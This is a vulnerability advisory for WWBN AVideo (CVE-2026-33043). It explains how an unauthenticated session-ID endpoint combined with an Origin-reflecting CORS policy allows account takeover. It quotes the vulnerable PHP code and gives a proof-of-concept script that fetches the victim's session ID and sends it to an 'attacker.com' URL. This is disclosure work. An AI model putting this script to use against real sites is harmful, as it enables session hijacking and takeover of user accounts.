PT-2026-26000 · Packagist · Wwbn Avideo
Published
2026-03-17
·
Updated
2026-03-17
·
CVE-2026-33043
CVSS v3.1
8.1
| Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.Details
File:
objects/phpsessionid.json.phpallowOrigin();
$obj = new stdClass();
$obj->phpsessid = session id();
echo json encode($obj);No authentication is required. The
allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:$HTTP ORIGIN = empty($ SERVER['HTTP ORIGIN']) ? @$ SERVER['HTTP REFERER'] : $ SERVER['HTTP ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP ORIGIN);
header("Access-Control-Allow-Credentials: true");This means any external website can make a credentialed cross-origin request and read the session ID.
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Wwbn Avideo